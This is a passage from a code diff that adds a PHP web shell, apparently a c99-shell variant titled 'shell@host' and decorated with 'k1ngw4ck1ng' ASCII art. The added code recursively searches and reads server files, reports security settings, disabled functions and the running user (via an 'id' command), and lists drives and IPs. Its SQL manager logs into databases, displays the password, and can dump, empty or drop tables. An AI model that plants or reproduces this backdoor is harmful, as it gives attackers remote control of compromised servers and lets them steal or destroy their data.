+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
